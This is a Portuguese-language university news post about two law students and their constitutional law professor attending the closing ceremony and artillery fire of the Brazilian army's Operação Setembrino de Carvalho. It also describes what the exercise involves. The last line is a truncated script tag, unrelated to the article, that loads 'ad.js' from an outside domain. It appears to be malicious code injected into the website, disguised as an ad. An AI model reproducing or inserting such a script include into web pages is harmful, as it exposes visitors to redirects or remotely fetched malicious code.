Os acadêmicos do curso de Direito (4ª fase, Turma II) da Universidade do Contestado Campus Canoinhas, Micael Eduardo Bonfim e Vitor Chiquito Muchinski juntamente com o professor da disciplina de Direito Constitucional José Mario Vipievski Junior participaram da solenidade e Coroamento da Operação Setembrino de Carvalho, enquanto autoridades civis representando o Curso de Direito e a Instituição UnC.
Também se realizou no Campo de Instrução Marechal Hermes da Fonseca a execução do Tiro de Artilharia. A atividade proposta teve como objetivo a integração civil-militar, bem como conhecimentos sobre a carreira militar, tendo como um de seus quesitos,a formação em Direito. Agradecimentos pelo convite ao Tenente André Proença e ao General Rodrigo Pereira Vergana.
O que é a Operação:
A colocação dos diversos integrantes dos grupos de artilharia para apresentar manobras de arma-base, acompanhados por Observadores, Controladores e Avaliadores (OCA), bem como para identificar alvos contextualizados da manobra do inimigo figurado, foram um dos diferenciais do exercício. A Operação Setembrino de Carvalho também buscou criar desafios sob a forma de problemas militares simulados, que exploram a vastidão de possibilidades técnicas e táticas para a aplicação de fogos de artilharia em combate, especialmente, a ocupação de posições em situações de restrição de tempo e espaço em meio a pedidos de tiro com variados graus de dificuldade técnica. Tudo isso visou alcançar o mais importante dos objetivos: imitar o combate real!
… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>